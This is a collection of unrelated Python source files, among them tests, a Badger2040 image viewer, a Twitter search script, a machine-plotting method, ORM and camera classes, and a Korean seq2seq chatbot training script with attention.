nilq/baby-python
python
# Copyright © 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""All of the message templates used across the various services."""
import json

import stan.pb.protocol_pb2 as protocol
from stan.aio.client import Msg

from queue_common import messages


def test_create_payment_msg():
    """Assert a payment message can be created."""
    # setup
    identifier = 'test_id'
    status = 'TEST_STATUS'

    # BUG FIX: this previously *returned* the comparison instead of
    # asserting it, so pytest could never fail this test.
    assert messages.create_payment_msg(identifier, status) == \
        {'paymentToken': {'id': identifier, 'statusCode': status}}


def test_get_payment_id_from_msg():
    """Assert that an id can be extracted from the payment message."""
    # setup: build a NATS-streaming Msg carrying the serialized token
    identifier = 'test_id'
    status = 'TEST_STATUS'
    token = {'paymentToken': {'id': identifier, 'statusCode': status}}
    msg = Msg()
    msg.proto = protocol.MsgProto
    msg.proto.data = json.dumps(token).encode('utf-8')

    assert identifier == messages.get_payment_id_from_msg(msg)
    # A missing message yields a falsy id rather than raising.
    assert not messages.get_payment_id_from_msg(None)
nilq/baby-python
python
from . import location
nilq/baby-python
python
# Badger2040 e-ink image viewer (MicroPython): cycles through 1-bit
# 296x128 .bin images in /images using the up/down buttons.
import os
import sys
import time
import machine
import badger2040
from badger2040 import WIDTH, HEIGHT

# NOTE(review): "REAMDE" is a misspelling of "README"; the name is only
# used below to write images/readme.txt, so behavior is unaffected.
REAMDE = """
Images must be 296x128 pixel with 1bit colour depth.

You can use examples/badger2040/image_converter/convert.py to convert them:

python3 convert.py --binary --resize image_file_1.png image_file_2.png image_file_3.png

Create a new "images" directory via Thonny, and upload the .bin files there.
"""

OVERLAY_BORDER = 40
OVERLAY_SPACING = 20
OVERLAY_TEXT_SIZE = 0.5

TOTAL_IMAGES = 0


# Try to preload BadgerPunk image
try:
    os.mkdir("images")
except OSError:
    pass

try:
    import badgerpunk
    with open("images/badgerpunk.bin", "wb") as f:
        f.write(badgerpunk.data())
        f.flush()
    with open("images/readme.txt", "w") as f:
        f.write(REAMDE)
        f.flush()
    del badgerpunk
except (OSError, ImportError):
    pass

# Enumerate the available image files (best-effort: missing dir -> 0 images).
try:
    IMAGES = [f for f in os.listdir("/images") if f.endswith(".bin")]
    TOTAL_IMAGES = len(IMAGES)
except OSError:
    pass

display = badger2040.Badger2040()

button_a = machine.Pin(badger2040.BUTTON_A, machine.Pin.IN, machine.Pin.PULL_DOWN)
button_b = machine.Pin(badger2040.BUTTON_B, machine.Pin.IN, machine.Pin.PULL_DOWN)
button_c = machine.Pin(badger2040.BUTTON_C, machine.Pin.IN, machine.Pin.PULL_DOWN)
button_up = machine.Pin(badger2040.BUTTON_UP, machine.Pin.IN, machine.Pin.PULL_DOWN)
button_down = machine.Pin(badger2040.BUTTON_DOWN, machine.Pin.IN, machine.Pin.PULL_DOWN)

# One full-screen 1-bit frame buffer (296*128/8 bytes).
image = bytearray(int(296 * 128 / 8))
current_image = 0
show_info = True


# Draw an overlay box with a given message within it
def draw_overlay(message, width, height, line_spacing, text_size):
    # Draw a light grey background
    display.pen(12)
    display.rectangle((WIDTH - width) // 2, (HEIGHT - height) // 2, width, height)

    # Take the provided message and split it up into
    # lines that fit within the specified width
    words = message.split(" ")
    lines = []
    current_line = ""
    for word in words:
        if display.measure_text(current_line + word + " ", text_size) < width:
            current_line += word + " "
        else:
            lines.append(current_line.strip())
            current_line = word + " "
    lines.append(current_line.strip())

    display.pen(0)
    display.thickness(2)

    # Display each line of text from the message, centre-aligned
    num_lines = len(lines)
    for i in range(num_lines):
        length = display.measure_text(lines[i], text_size)
        current_line = (i * line_spacing) - ((num_lines - 1) * line_spacing) // 2
        display.text(lines[i], (WIDTH - length) // 2, (HEIGHT // 2) + current_line, text_size)


def show_image(n):
    # Load image n into the frame buffer and draw it, plus optional overlays:
    # file-name label (bottom-left) and a position indicator (right edge).
    file = IMAGES[n]
    name = file.split(".")[0]
    # NOTE(review): opened in text mode "r" then readinto a bytearray —
    # this relies on MicroPython stream semantics; CPython would require "rb".
    open("images/{}".format(file), "r").readinto(image)
    display.image(image)

    if show_info:
        name_length = display.measure_text(name, 0.5)
        display.pen(0)
        display.rectangle(0, HEIGHT - 21, name_length + 11, 21)
        display.pen(15)
        display.rectangle(0, HEIGHT - 20, name_length + 10, 20)
        display.pen(0)
        display.text(name, 5, HEIGHT - 10, 0.5)

        # One small square per image; the current one is left filled.
        for i in range(TOTAL_IMAGES):
            x = 286
            y = int((128 / 2) - (TOTAL_IMAGES * 10 / 2) + (i * 10))
            display.pen(0)
            display.rectangle(x, y, 8, 8)
            if current_image != i:
                display.pen(15)
                display.rectangle(x + 1, y + 1, 6, 6)

    display.update()


if TOTAL_IMAGES == 0:
    display.pen(15)
    display.clear()
    draw_overlay("To run this demo, create an /images directory on your device and upload some 1bit 296x128 pixel images.", WIDTH - OVERLAY_BORDER, HEIGHT - OVERLAY_BORDER, OVERLAY_SPACING, OVERLAY_TEXT_SIZE)
    display.update()
    sys.exit()


show_image(current_image)

# Main loop: poll the buttons and redraw on every press.
while True:
    if button_up.value():
        if current_image > 0:
            current_image -= 1
        show_image(current_image)
    if button_down.value():
        if current_image < TOTAL_IMAGES - 1:
            current_image += 1
        show_image(current_image)
    if button_a.value():
        # Toggle the name/position overlay.
        show_info = not show_info
        show_image(current_image)
    if button_b.value() or button_c.value():
        # Show help for 4 seconds, then restore the current image.
        display.pen(15)
        display.clear()
        draw_overlay("To add images connect Badger2040 to a PC, load up Thonny, and see readme.txt in images/", WIDTH - OVERLAY_BORDER, HEIGHT - OVERLAY_BORDER, OVERLAY_SPACING, 0.5)
        display.update()
        time.sleep(4)
        show_image(current_image)

    time.sleep(0.01)
nilq/baby-python
python
"""Fetch recent tweets from one account via the Twitter v1.1 search API
and pretty-print the JSON response to text.json.

Fixes over the original:
- ``reload(sys)`` / ``sys.setdefaultencoding`` were Python-2-only hacks and
  ``sys`` was never imported, so the script crashed with NameError on
  Python 3; both removed.
- The ``since:`` search operator was sent as a separate query parameter
  (``&since%3A...``); operators must live inside ``q``. The query is now
  built with ``requests``' ``params=``, which handles percent-encoding.
- The output file was opened in binary mode but written a str (TypeError
  on Python 3); it is now opened in text mode with explicit UTF-8.
"""
import json

import requests
from requests_oauthlib import OAuth1

# OAuth1 credentials — replace the placeholders with real values.
params = {'app_key': 'xx',
          'app_secret': 'xx',
          'access_token': 'xx-xx',
          'access_secret': 'xx'}
auth = OAuth1(params['app_key'], params['app_secret'],
              params['access_token'], params['access_secret'])

twittername = 'nameoftwitteraccount'
# Twitter API can only limit by day
since = '2017-09-20'  # date

# https://dev.twitter.com/rest/public/search
# 'from:' and 'since:' are search operators and belong inside q;
# requests percent-encodes the query string for us.
url_rest = 'https://api.twitter.com/1.1/search/tweets.json'
query = {'q': 'from:{} since:{}'.format(twittername, since),
         'result_type': 'recent'}

response = requests.get(url_rest, params=query, auth=auth)
results = response.json()                    # convert json into dict
results = json.dumps(results, indent=4)      # pretty-print, converts to str

with open('text.json', 'w', encoding='utf-8') as out:
    out.write(results)
nilq/baby-python
python
# -*- coding: utf-8 -*-
import matplotlib.pyplot as plt

from ....Functions.init_fig import init_fig


def plot(
    self,
    fig=None,
    ax=None,
    sym=1,
    alpha=0,
    delta=0,
    is_edge_only=False,
    comp_machine=None,
    is_show_fig=True,
    save_path=None,
    win_title=None,
):
    """Plot the Machine in a matplotlib fig

    Parameters
    ----------
    self : Machine
        A Machine object
    fig : Matplotlib.figure.Figure
        existing figure to use if None create a new one
    ax : Matplotlib.axes.Axes object
        Axis on which to plot the data
    sym : int
        Symmetry factor (1= full machine, 2= half of the machine...)
    alpha : float
        Angle for rotation [rad]
    delta : complex
        Complex value for translation
    is_edge_only: bool
        To plot transparent Patches
    comp_machine : Machine
        A machine to plot in transparency on top of the self machine
    is_show_fig : bool
        To call show at the end of the method
    save_path : str
        full path including folder, name and extension of the file to save
        if save_path is not None
    win_title : str
        Title to set on the matplotlib window (defaults to
        "<machine name> plot machine" when the machine has a name)
    """
    (fig, ax, _, _) = init_fig(fig=fig, ax=ax, shape="rectangle")

    # Call each plot method to properly set the legend
    if self.frame is not None:
        self.frame.plot(
            fig=fig,
            ax=ax,
            sym=sym,
            alpha=alpha,
            delta=delta,
            is_edge_only=is_edge_only,
            is_show_fig=False,
        )
        # Equivalent frame height, used to extend the axis limits below.
        Wfra = self.frame.comp_height_eq()
    else:
        Wfra = 0

    # Determine order of plotting parts: laminations from outermost inwards.
    lam_list = self.get_lam_list(is_int_to_ext=True)
    Rext = lam_list[-1].Rext

    for lam in lam_list[::-1]:
        lam.plot(
            fig=fig,
            ax=ax,
            sym=sym,
            alpha=alpha,
            delta=delta,
            is_edge_only=is_edge_only,
            is_show_fig=False,
        )

    # Shaft is only drawn when the innermost lamination leaves room for it.
    if lam_list[0].Rint > 0 and self.shaft is not None:
        self.shaft.plot(
            fig=fig,
            ax=ax,
            sym=sym,
            alpha=alpha,
            delta=delta,
            is_edge_only=is_edge_only,
            is_show_fig=False,
        )

    Lim = (Rext + Wfra) * 1.5  # Axes limit for plot

    # Optional comparison machine drawn edge-only on top.
    # NOTE(review): these calls forward is_show_fig, so show() may be
    # triggered here before the axis setup below — confirm intent.
    if comp_machine is not None:
        comp_machine.rotor.plot(
            fig,
            ax,
            sym=sym,
            alpha=alpha,
            delta=delta,
            is_edge_only=True,
            is_show_fig=is_show_fig,
        )
        comp_machine.stator.plot(
            fig,
            ax,
            sym=sym,
            alpha=alpha,
            delta=delta,
            is_edge_only=True,
            is_show_fig=is_show_fig,
        )

    ax.set_xlabel("(m)")
    ax.set_ylabel("(m)")
    ax.set_title(self.name)

    # Axis Setup
    plt.axis("equal")

    # The Lamination is centered in the figure
    ax.set_xlim(-Lim, Lim)
    ax.set_ylim(-Lim, Lim)

    # Set Windows title
    if self.name not in ["", None] and win_title is None:
        win_title = self.name + " plot machine"

    if save_path is not None:
        fig.savefig(save_path)
        plt.close()

    # NOTE(review): when save_path is set the figure was just closed, so
    # fig.show() / set_window_title below act on a closed figure — confirm.
    if is_show_fig:
        fig.show()

    if win_title:
        manager = plt.get_current_fig_manager()
        if manager is not None:
            manager.set_window_title(win_title)
nilq/baby-python
python
from core.Model import *
from core.Utils import Utils
from models.User import User
from models.AppVersion import AppVersion


class Device(Base, Model):
    """ORM model for a user's device (push token, app version, audit info)."""

    __tablename__ = "device"

    id = Column(BigInteger, primary_key=True, autoincrement=True)
    # Device-generated unique identifier.
    uuid = Column(String(300), nullable=False)
    user_id = Column(Integer, ForeignKey(User.id), nullable=False)
    # Push-notification token; None until registered.
    token = Column(String(100), default=None)
    app_version_id = Column(BigInteger, ForeignKey(AppVersion.id), default=1)
    # NOTE(review): Utils.time() is CALLED here, so these defaults are
    # evaluated once at import time, not per row. If a per-insert timestamp
    # is intended, pass the callable (default=Utils.time) instead — confirm
    # Utils.time semantics before changing.
    created = Column(DateTime, default=Utils.time())
    updated = Column(DateTime, default=Utils.time(), onupdate=Utils.time())
    # Soft-delete / active flag (1 = enabled).
    enable = Column(mysql.TINYINT(1), default=1)

    user = relationship(User)
    app_version = relationship(AppVersion)

    # Serialization formatters applied to datetime fields.
    formatters = {"created": Utils.date_formatter,
                  "updated": Utils.date_formatter}
python
from .BaseCamera import BaseCamera
import numpy as np
import math


# NOTE(review): class name "PersPectiveCamera" has a stray capital P;
# kept as-is because external callers reference this name.
class PersPectiveCamera(BaseCamera):
    """Pinhole/perspective camera: builds an OpenGL-style projection matrix
    from x/y magnifications derived from FOV, focal length, or sensor size."""

    def __init__(self):
        BaseCamera.__init__(self, "PerspectiveCamera")

    def get_projection_mat(self):
        """Return the 4x4 perspective projection matrix (numpy array).

        Layout follows http://www.songho.ca/opengl/gl_projectionmatrix.html
        with magnification_x/y playing the role of 2*n/(r-l) and 2*n/(t-b).
        """
        # http://www.songho.ca/opengl/gl_projectionmatrix.html
        projection_mat = np.eye(4)
        projection_mat[0, 0] = 2 / self.magnification_x
        projection_mat[1, 1] = 2 / self.magnification_y
        projection_mat[2, 2] = -(self.far + self.near) / (self.far - self.near)
        projection_mat[2, 3] = -(2 * self.far * self.near) / (self.far - self.near)
        projection_mat[3, 2] = -1
        projection_mat[3, 3] = 0
        return projection_mat

    def set_by_field_of_view(self, fov_x, fov_y=None):
        '''
        Set the intrinsic by given field of view.

        NOTE(review): the original docstring said "in angle degrees", but
        math.tan receives the value unconverted, i.e. it is treated as
        RADIANS. Either callers must pass radians or a math.radians()
        conversion is missing — confirm against call sites.

        :param fov_x:
        :param fov_y: Optional for y direction; Use the same value as for x direction if None
        '''
        if fov_y is None:
            fov_y = fov_x
        self.set_parameters(
            magnification_x=2 * math.tan(fov_x / 2),
            magnification_y=2 * math.tan(fov_y / 2),
        )

    def set_by_35mm_equivalent_focal_length(self, focal_x, focal_y=None):
        '''
        Set the intrinsic by given 35mm equivalent focal lengths.
        https://en.wikipedia.org/wiki/35_mm_equivalent_focal_length
        :param focal_x:
        :param focal_y: Optional for y direction; Use the same value as for x direction if None
        '''
        if focal_y is None:
            focal_y = focal_x
        # 35mm equivalent sensor width and height for this camera, keeping
        # the 36x24mm diagonal while matching this camera's aspect ratio.
        film_35mm_height = math.sqrt((36 ** 2 + 24 ** 2) / (1 + self.aspect_ratio ** 2))
        film_35mm_width = film_35mm_height * self.aspect_ratio
        self.set_parameters(
            magnification_x=film_35mm_width / focal_x,
            magnification_y=film_35mm_height / focal_y
        )

    def set_by_sensor_and_focal_length(self, sensor_width, sensor_height, focal_x, focal_y=None):
        """Set the intrinsic from a physical sensor size and focal length(s);
        also updates aspect_ratio from the sensor dimensions."""
        self.aspect_ratio = sensor_width / sensor_height
        if focal_y is None:
            focal_y = focal_x
        self.set_parameters(
            magnification_x=sensor_width / focal_x,
            magnification_y=sensor_height / focal_y
        )
nilq/baby-python
python
""" django admin pages for program support models """ from config_models.admin import ConfigurationModelAdmin from django.contrib import admin from openedx.core.djangoapps.programs.models import ProgramsApiConfig class ProgramsApiConfigAdmin(ConfigurationModelAdmin): pass admin.site.register(ProgramsApiConfig, ProgramsApiConfigAdmin)
nilq/baby-python
python
import pandas as pd  # BUG FIX: was `import pandas`, but the code below uses the `pd` alias


def find_na(df):
    """Print and return the number of missing (NA/NaN) values per column.

    :param df: a pandas DataFrame (or Series)
    :return: per-column NA counts as returned by ``pd.isna(df).sum()``
             (returned in addition to printing, so callers can use the result)
    """
    na_counts = pd.isna(df).sum()
    print(na_counts)
    return na_counts
nilq/baby-python
python
#!/usr/bin/env python3 import pyglet import glooey import run_demos window = pyglet.window.Window() gui = glooey.Gui(window) bin = glooey.Bin() widget = glooey.Placeholder(100, 100) bin.add(widget) gui.add(bin) @run_demos.on_space(gui) def test_bin(): bin.add(widget) yield "Put a widget in the bin." bin.clear() yield "Clear the bin." pyglet.app.run()
nilq/baby-python
python
# -*- coding:utf-8 -*-
"""Korean chatbot seq2seq demo (part 1).

Loads the songys ChatbotData corpus, tokenizes with SentencePiece, builds
padded encoder/decoder tensors, defines pad-masked loss/accuracy, walks
through dot-product attention step by step, and trains a SimpleRNN
encoder-decoder with attention.
"""
import os
import random

import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import sentencepiece as spm
import tensorflow as tf
import tensorflow.keras.backend as K

os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'  # silence TF info/warning logs

# Fix all RNG seeds for reproducibility.
random_seed = 1234
random.seed(random_seed)
np.random.seed(random_seed)
tf.random.set_seed(random_seed)

print(tf.__version__)
print(tf.config.list_physical_devices('GPU'))
print(tf.test.gpu_device_name())

#
# prepare dir
#
data_dir = './data'
if not os.path.exists(data_dir):
    data_dir = '../data'  # fall back when run from a subdirectory
print(os.listdir(data_dir))

songys_dir = os.path.join(data_dir, 'songys')
if not os.path.exists(songys_dir):
    os.makedirs(songys_dir)

train_txt = os.path.join(songys_dir, 'ChatbotData.csv')


#
# file check
#
def print_file(filename, count=10):
    """
    Print the file's contents, up to `count` lines.
    :param filename: file name
    :param count: print line count
    """
    with open(filename) as f:
        for i, line in enumerate(f):
            print(line.strip())
            if count < i:
                break


#
# data read
# https://pandas.pydata.org/pandas-docs/stable/index.html
#
# header=0: first row is the header
train_data = pd.read_csv(train_txt, header=0, delimiter=',')
print(f'전체 학습 raw 개수: {len(train_data)}')
train_data = train_data.dropna()
print(f'전체 학습 valid 개수: {len(train_data)}')
train_data = train_data.sample(1000)  # use only 1,000 samples for a quick run
print(f'전체 학습 sample 개수: {len(train_data)}')
label_counts = train_data['label'].value_counts()
print(f'전체 학습 label 개수: {label_counts}')

#
# vocabulary
#
# load the pretrained SentencePiece model
vocab_file = os.path.join(data_dir, 'ko_32000.model')
vocab = spm.SentencePieceProcessor()
vocab.load(vocab_file)

#
# tokenize
#
questions, answers = [], []
for i, row in train_data.iterrows():
    question = vocab.encode_as_pieces(row['Q'])
    questions.append(question)
    answer = vocab.encode_as_pieces(row['A'])
    answers.append(answer)
assert len(questions) == len(answers)

print(questions[:100])
print(answers[:100])

#
# token to id
#
question_ids = [[vocab.piece_to_id(p) for p in question] for question in questions]
answer_ids = [[vocab.piece_to_id(p) for p in answer] for answer in answers]
print(question_ids[:100])
print(answer_ids[:100])

#
# pad
#
# rows have different lengths, so numpy cannot form a rectangular matrix yet
print(np.array(question_ids)[:50])
print(np.array(answer_ids)[:50])

# inspect sequence lengths
question_length = [len(question_id) for question_id in question_ids]
print(question_length[:100])
answer_length = [len(answer_id) for answer_id in answer_ids]
print(answer_length[:100])

# maximum lengths
# NOTE(review): the two names look swapped (answer_max_length gets
# max(question_length)); harmless since only max() of both is used below.
answer_max_length, question_max_length = max(question_length), max(answer_length)
# choose the max sequence length (+2 leaves room for BOS/EOS; value is arbitrary)
n_seq = max(answer_max_length, question_max_length) + 2
print(answer_max_length, question_max_length, n_seq)

#
# inputs
#
# zero-initialized (i.e. pre-padded) training matrices, shape (samples, n_seq)
enc_inputs = np.zeros((len(question_ids), n_seq))
dec_inputs = np.zeros((len(answer_ids), n_seq))
dec_labels = np.zeros((len(answer_ids), n_seq))
print(enc_inputs.shape, enc_inputs[0], enc_inputs[-1])
print(dec_inputs.shape, dec_inputs[0], dec_inputs[-1])
print(dec_labels.shape, dec_labels[0], dec_labels[-1])

# assign question_ids to enc_inputs (right-pad with 0, then truncate to n_seq)
for i, token_id in enumerate(question_ids):
    token_id += [0] * (n_seq - len(token_id))
    token_id = token_id[:n_seq]
    assert len(token_id) == n_seq
    enc_inputs[i] = token_id
print(enc_inputs.shape, enc_inputs[0], enc_inputs[-1])

# assign answer_ids to dec_inputs (BOS + tokens) and dec_labels (tokens + EOS)
n_max = n_seq - 1
for i, token_id in enumerate(answer_ids):
    token_id = token_id[:n_max]
    dec_input = [vocab.bos_id()] + token_id
    dec_input += [0] * (n_seq - len(dec_input))
    dec_label = token_id + [vocab.eos_id()]
    dec_label += [0] * (n_seq - len(dec_label))
    assert len(dec_input) == len(dec_label) == n_seq
    dec_inputs[i] = dec_input
    dec_labels[i] = dec_label
# NOTE(review): np.int is removed in NumPy >= 1.24 — use int or np.int64
print(dec_inputs.shape, dec_inputs[0].astype(np.int), dec_inputs[-1].astype(np.int))
print(dec_labels.shape, dec_labels[0].astype(np.int), dec_labels[-1].astype(np.int))

train_inputs = (enc_inputs, dec_inputs)


#
# loss and accuracy
#
def lm_loss(y_true, y_pred):
    """
    Compute the cross-entropy loss while excluding pad (id 0) positions.
    :param y_true: ground-truth token ids
    :param y_pred: predicted token probabilities
    :return loss: per-position loss with pad positions zeroed out
    """
    loss = tf.keras.losses.SparseCategoricalCrossentropy(reduction=tf.keras.losses.Reduction.NONE)(y_true, y_pred)
    mask = tf.cast(tf.not_equal(y_true, 0), tf.float32)  # 1 where not pad
    loss *= mask
    return loss


def lm_acc(y_true, y_pred):
    """
    Compute accuracy while excluding pad (id 0) positions.
    :param y_true: ground-truth token ids
    :param y_pred: predicted token probabilities
    :return: accuracy over non-pad positions
    """
    y_pred_class = tf.cast(K.argmax(y_pred, axis=-1), tf.float32)
    y_true = tf.cast(y_true, tf.float32)
    matches = tf.cast(K.equal(y_true, y_pred_class), tf.float32)
    mask = tf.cast(tf.not_equal(y_true, 0), tf.float32)
    matches *= mask
    # divide by the non-pad count (guarded against division by zero)
    accuracy = K.sum(matches) / K.maximum(K.sum(mask), 1)
    return accuracy


#
# Attention (step-by-step walkthrough on toy data)
#
# inputs
enc_tokens = np.random.randint(1, 10, (1, 5))
print(enc_tokens)
dec_tokens = np.random.randint(1, 10, (1, 6))
print(dec_tokens)

# embedding
embedding = tf.keras.layers.Embedding(10, 4)
enc_embed = embedding(enc_tokens)
print(enc_embed)
dec_embed = embedding(dec_tokens)
print(dec_embed)

# score by for loop (naive reference implementation)
attn_score_t = np.zeros((len(dec_embed[0]), len(enc_embed[0])))
print(attn_score_t)
for i in range(len(dec_embed[0])):
    dec_hidden = dec_embed[0][i]
    for j in range(len(enc_embed[0])):
        enc_hidden = enc_embed[0][j]
        score = tf.matmul([dec_hidden], [enc_hidden], transpose_b=True)
        attn_score_t[i][j] = score[0]
print(attn_score_t)

# score by matmul (same result, vectorized)
attn_score = tf.matmul(dec_embed, enc_embed, transpose_b=True)
print(attn_score)

# attn prob: softmax over encoder positions
attn_prob = tf.nn.softmax(attn_score, axis=-1)
print(attn_prob)

# attention output by for loop (weighted sum, naive reference)
attn_out_t = np.zeros((len(dec_embed[0]), len(dec_embed[0][0])))
print(attn_out_t)
for i in range(len(attn_prob[0])):
    attn_row = attn_prob[0][i]
    assert len(attn_row) == len(enc_embed[0])
    weighted_sum = 0
    for j in range(len(enc_embed[0])):
        enc_hidden = enc_embed[0][j]
        weighted_sum += attn_row[j] * enc_hidden
    attn_out_t[i] = weighted_sum
print(attn_out_t)

# attention output by matmul
attn_out = tf.matmul(attn_prob, enc_embed)
print(attn_out)


class DotProductAttention(tf.keras.layers.Layer):
    """Dot-product attention layer: softmax(dec @ enc^T) @ enc."""

    def __init__(self, **kwargs):
        """
        init class
        :param kwargs: forwarded to tf.keras.layers.Layer
        """
        super().__init__(**kwargs)

    def call(self, inputs):
        """
        run layer
        :param inputs: (enc_input, dec_input) tuple of hidden-state tensors
        :return attn_out: attention output, same feature size as enc_input
        """
        enc_input, dec_input = inputs
        # attention score (dot-product)
        attn_score = tf.matmul(dec_input, enc_input, transpose_b=True)
        # attention prob
        attn_prob = tf.nn.softmax(attn_score, axis=-1)
        # weighted sum
        attn_out = tf.matmul(attn_prob, enc_input)
        return attn_out


# attention via the layer class (matches the manual result above)
attn_out_c = DotProductAttention()((enc_embed, dec_embed))
print(attn_out_c)


#
# rnn
#
def build_model_rnn_dot(n_vocab, d_model):
    """
    Build a SimpleRNN encoder-decoder with dot-product attention.
    :param n_vocab: number of vocab
    :param d_model: hidden size
    :return model: compiled-ready keras Model taking (enc_inputs, dec_inputs)
    """
    enc_inputs = tf.keras.layers.Input((None,))
    dec_inputs = tf.keras.layers.Input((None,))

    # shared embedding for encoder and decoder tokens
    embedding = tf.keras.layers.Embedding(n_vocab, d_model)

    enc_hidden = embedding(enc_inputs)  # bs, n_seq, d_model
    enc_hidden, fw_h = tf.keras.layers.SimpleRNN(units=d_model, return_sequences=True, return_state=True)(enc_hidden)  # bs, n_seq, d_model

    dec_hidden = embedding(dec_inputs)  # bs, n_seq, d_model
    # decoder starts from the encoder's final state
    dec_hidden = tf.keras.layers.SimpleRNN(units=d_model, return_sequences=True)(dec_hidden, initial_state=[fw_h])  # bs, n_seq, d_model

    attn = DotProductAttention()
    attn_out = attn((enc_hidden, dec_hidden))  # bs, n_seq, d_model

    # concatenate decoder state with attention context before the softmax head
    hidden = tf.concat([dec_hidden, attn_out], axis=-1)  # bs, n_seq, 2 * d_model

    outputs = tf.keras.layers.Dense(n_vocab, activation=tf.nn.softmax)(hidden)

    model = tf.keras.Model(inputs=(enc_inputs, dec_inputs), outputs=outputs)
    return model


# model build
model_rnn = build_model_rnn_dot(len(vocab), 256)
print(model_rnn.summary())

# compile
model_rnn.compile(loss=lm_loss, optimizer=tf.keras.optimizers.Adam(), metrics=[lm_acc])

# early stopping on the masked-accuracy metric
early_stopping = tf.keras.callbacks.EarlyStopping(monitor='lm_acc', patience=10)

# save weights
save_rnn_dot_file = os.path.join(songys_dir, 'rnn_dot.hdf5')
# checkpoint the best weights (by masked accuracy) each epoch
save_weights = tf.keras.callbacks.ModelCheckpoint(save_rnn_dot_file, monitor='lm_acc', verbose=1, save_best_only=True, mode='max', save_freq='epoch', save_weights_only=True)

# train
history = model_rnn.fit(train_inputs, dec_labels, epochs=500, batch_size=128, callbacks=[early_stopping, save_weights])


def draw_history(history, acc='lm_acc'):
    """
    draw training history
    :param history: training history object
    :param acc: acc key
    """
    plt.figure(figsize=(12, 4))

    plt.subplot(1, 2, 1)
    plt.plot(history.history['loss'], 'b-', label='loss')
    plt.xlabel('Epoch')
    plt.legend()

    plt.subplot(1, 2, 2)
    plt.plot(history.history[acc], 'g-', label=acc)
    plt.xlabel('Epoch')
    plt.legend()

    plt.show()


draw_history(history)


def do_predict(vocab, model, n_seq, string):
    """
    Generate the response one token at a time, sampling from the model's
    output distribution, until EOS or the sequence limit.
    :param vocab: vocab (SentencePiece processor)
    :param model: model object
    :param n_seq: sequence length (number of sequence)
    :param string: input string
    :return response: generated response for the input string
    """
    # encoder input: ids of the prompt, zero-padded to n_seq
    # encoder_tokens = vocab.encode_as_pieces(string)
    enc_inputs = vocab.encode_as_ids(string)[:n_seq]
    enc_inputs += [0] * (n_seq - len(enc_inputs))
    assert len(enc_inputs) == n_seq

    # decoder input: starts with BOS, filled in as tokens are generated
    # decoder_tokens = ['[BOS]']
    dec_inputs = [vocab.bos_id()]
    dec_inputs += [0] * (n_seq - len(dec_inputs))

    response = []
    for i in range(n_seq - 1):
        outputs = model.predict([np.array([enc_inputs]), np.array([dec_inputs])])
        prob = outputs[0][i]
        # sample the next token id from the predicted distribution
        word_id = int(np.random.choice(len(vocab), 1, p=prob)[0])
        if word_id == vocab.eos_id():
            break
        response.append(word_id)
        dec_inputs[i + 1] = word_id
    return vocab.decode_ids(response)


# rebuild (untrained) to show pre-training output, then load best weights
model_rnn = build_model_rnn_dot(len(vocab), 256)
print(model_rnn.summary())

string = '안녕 만나서 반가워'
print(do_predict(vocab, model_rnn, n_seq, string))

model_rnn.load_weights(save_rnn_dot_file)
print(do_predict(vocab, model_rnn, n_seq, string))


#
# bi rnn
#
def build_model_bi_rnn_dot(n_vocab, d_model):
    """
    Build a bidirectional-RNN encoder / RNN decoder with dot-product attention.
    :param n_vocab: number of vocab
    :param d_model: hidden size
    :return model: keras Model taking (enc_inputs, dec_inputs)
    """
    enc_inputs = tf.keras.layers.Input((None,))
    dec_inputs = tf.keras.layers.Input((None,))

    embedding = tf.keras.layers.Embedding(n_vocab, d_model)

    enc_hidden = embedding(enc_inputs)  # bs, n_seq, d_model
    # NOTE(review): without return_sequences=True the Bidirectional wrapper
    # returns only the final states, so the attention below attends over a
    # single vector rather than the whole encoder sequence — confirm intent.
    enc_hidden, fw_h, bw_h = tf.keras.layers.Bidirectional(tf.keras.layers.SimpleRNN(units=d_model, return_state=True))(enc_hidden)  # bs, 2 * d_model
    # initial decoder state: forward and backward final states concatenated
    s_h = tf.concat([fw_h, bw_h], axis=-1)  # bs, 2 * d_model

    dec_hidden = embedding(dec_inputs)  # bs, n_seq, d_model
    dec_hidden = tf.keras.layers.SimpleRNN(units=d_model * 2, return_sequences=True)(dec_hidden, initial_state=[s_h])  # bs, n_seq, 2 * d_model

    attn = DotProductAttention()
    attn_out = attn((enc_hidden, dec_hidden))  # bs, n_seq, 2 * d_model

    hidden = tf.concat([dec_hidden, attn_out], axis=-1)  # bs, n_seq, 4 * d_model

    outputs = tf.keras.layers.Dense(n_vocab, activation=tf.nn.softmax)(hidden)

    model = tf.keras.Model(inputs=(enc_inputs, dec_inputs), outputs=outputs)
    return model


# model build
model_bi_rnn = build_model_bi_rnn_dot(len(vocab), 256)
print(model_bi_rnn.summary())

# compile
# https://www.tensorflow.org/api_docs/python/tf/keras/optimizers/Adam
model_bi_rnn.compile(loss=lm_loss, optimizer=tf.keras.optimizers.Adam(), metrics=[lm_acc])

# early stopping
early_stopping = tf.keras.callbacks.EarlyStopping(monitor='lm_acc', patience=10)

# save weights
save_bi_rnn_dot_file = os.path.join(songys_dir, 'bi_rnn_dot.hdf5')
save_weights = tf.keras.callbacks.ModelCheckpoint(save_bi_rnn_dot_file, monitor='lm_acc', verbose=1, save_best_only=True, mode='max', save_freq='epoch', save_weights_only=True)

# train
history = model_bi_rnn.fit(train_inputs, dec_labels, epochs=500, batch_size=128, callbacks=[early_stopping, save_weights])

# history
draw_history(history)

# rebuild (untrained), show output, then load best weights and compare
model_bi_rnn = build_model_bi_rnn_dot(len(vocab), 256)
print(model_bi_rnn.summary())

# NOTE(review): this call uses model_rnn, not model_bi_rnn — likely a typo
print(do_predict(vocab, model_rnn, n_seq, string))

model_bi_rnn.load_weights(save_bi_rnn_dot_file)
print(do_predict(vocab, model_bi_rnn, n_seq, string))
nilq/baby-python
python
#!/usr/bin/python import simple_test simple_test.test("test9", ["-VVV", "-N", "--noise", "-rr", ], expect_fail=True)
nilq/baby-python
python
import minpy
import minpy.numpy as np
import minpy.numpy.random as random
from minpy.core import grad_and_loss
# from examples.utils.data_utils import gaussian_cluster_generator as make_data
# from minpy.context import set_context, gpu

# Please uncomment following if you have GPU-enabled MXNet installed.
